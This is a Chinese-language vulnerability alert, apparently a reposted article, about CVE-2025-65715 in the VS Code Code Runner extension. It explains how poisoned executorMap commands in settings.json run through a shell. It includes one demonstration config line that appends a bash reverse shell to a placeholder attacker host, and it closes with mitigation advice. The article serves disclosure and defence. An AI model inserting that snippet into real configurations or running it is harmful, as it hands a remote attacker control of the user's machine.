文章总结： VSCode热门插件CodeRunner存在高危漏洞CVE-2025-65715，攻击者可通过篡改配置文件诱导用户执行任意恶意命令，实现远程代码执行。该漏洞源于插件未对用户配置中的命令进行安全检查，直接通过shell执行。目前所有版本均受影响且尚未修复，建议用户暂时禁用或卸载该插件，并避免使用来源不明的配置代码段。 综合评分： 78 文章分类： 漏洞预警,供应链安全,应用安全,终端安全,安全工具

微软 Code Runner 插件爆高危漏洞，配置文件被篡改可导致远程代码执行（CVE-2025-65715）

幻泉之洲

2026年2月27日 09:43 北京

安全研究人员发现，VS Code 热门插件「Code Runner」存在安全漏洞（CVE-2025-65715）。攻击者可以通过修改插件的配置文件，诱导用户在 VSCode 中执行任意恶意命令，从而实现远程代码执行（RCE）。目前该漏洞尚未修复，所有版本的插件都会受到影响。

漏洞速览

漏洞编号：CVE-2025-65715

漏洞插件：Code Runner

严重等级：高危（CVSS评分 7.8）

影响版本：Code Runner VS Code 扩展的所有版本

潜在危害：远程代码执行（RCE）、持久化攻击

插件是做什么的？为什么这么受欢迎？

Code Runner 是 VS Code 编辑器里一个非常受欢迎的插件，开发者用它来一键运行代码片段或者整个文件。它支持一大堆编程语言，像 Python、JavaScript、C/C++、Java 等等。好处就是不用你手动打开终端敲命令，直接在编辑器里点一下，结果就出来了，省了不少切换界面的麻烦。

漏洞是怎么产生的？

简单说，这个插件干活的方式是照着 VS Code 的配置文件（settings.json）里写好的命令来执行的。

问题出在，这些命令没有被好好检查。插件在后台用了 Node.js 的 child_process.spawn() 功能，还特意打开了 “shell: true” 选项，这就相当于给攻击者敞开了一扇门。

具体来看，插件会直接从用户设置的“code-runner.executorMap”里读取命令，然后原封不动地拿去执行。如果这个命令被恶意篡改了，比如里面夹带了私货，那就会被直接运行在用户的电脑上。

说实话，这种直接把用户配置拿来执行的操作，风险本来就不小。开发时要是没考虑到有人会改配置干坏事，就容易出这种问题。

攻击者会怎么利用它？

攻击者想利用这个漏洞，通常得先让用户的配置文件“中毒”。他们有两个主要路子：

• 钓鱼诱骗

  ：攻击者可能通过一封钓鱼邮件、一条聊天消息，或者一份伪造的技术文档，骗用户把一个“方便好用”的配置代码段复制粘贴到自己的 settings.json 文件里。一旦这个全局配置被污染，用户之后打开的任何项目都可能自动继承这个恶意命令。

• 恶意扩展插件

  ：有些本身就不怀好意的 VS Code 插件，或者在官方插件基础上“加料”的版本，可能会在安装后偷偷修改你的配置文件，或者“推荐”你应用一些恶心的项目设置。

不管是哪种方式，最终目的都一样：等你用 Code Runner 插件运行代码（比如一个简单的 .py 文件）时，攻击者预设的恶意命令就会被悄悄触发。

一个真实攻击例子

研究人员已经做了一个攻击演示。攻击者只要在你的 settings.json 文件里加上这么一段：

{    “code-runner.executorMap”: {      “python”: “python $fileName && bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1”    }  }

然后，你把“code-runner.runInTerminal”这个选项设为 true。接下来，只要你用 Code Runner 去运行任何一个 Python 文件，你的电脑就会在后台悄悄连接上攻击者指定的服务器，给对方开一个反向 Shell。这意味着攻击者能远程控制你的电脑了。

这个漏洞的危险之处在于，它可能通过你下载的不受信任的项目配置文件，或者仅仅是一次手动的错误配置（相信很多人都有根据教程修改设置的习惯），就悄无声息地中招。

已关注

关注

重播 分享 赞

关闭

观看更多

更多

退出全屏

切换到竖屏全屏退出全屏

幻泉之洲已关注

分享视频

，时长00:30

0/0

00:00/00:30

切换到横屏模式

继续播放

[ ]

进度条，百分之0

播放

00:00

/

00:30

00:30

倍速

全屏

倍速播放中

0.5倍 0.75倍 1.0倍 1.5倍 2.0倍

超清 流畅

继续观看

微软 Code Runner 插件爆高危漏洞，配置文件被篡改可导致远程代码执行（CVE-2025-65715）

观看更多

转载

,

微软 Code Runner 插件爆高危漏洞，配置文件被篡改可导致远程代码执行（CVE-2025-65715）

幻泉之洲已关注

分享点赞在看

已同步到看一看写下你的评论

视频详情

现在该怎么办？

截至发稿，这个漏洞似乎还没有官方修复补丁。因为问题出在所有版本的插件上，所以暂时没有安全的版本可以升级。

如果你正在使用 Code Runner 插件，而且不确定自己是否安全，目前最稳妥的做法是暂时禁用或卸载它，改用 VS Code 自带的任务运行功能或者其他你信得过的替代插件。

同时，提高警惕：不要轻易把来历不明的配置代码段复制到你的 VS Code 设置里，尤其是那些号称能“提升性能”或“解锁隐藏功能”的偏方。

说到底，强大的功能往往伴随着风险。像 Code Runner 这种能直接调用系统命令的插件，确实是效率工具，但也给了恶意代码可乘之机。这个漏洞提醒我们，对于这类深度集成在编辑器里的工具，保持谨慎和及时更新，可能比多用几个炫酷功能更重要。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：幻泉之洲 《微软 Code Runner 插件爆高危漏洞，配置文件被篡改可导致远程代码执行（CVE-2025-65715）》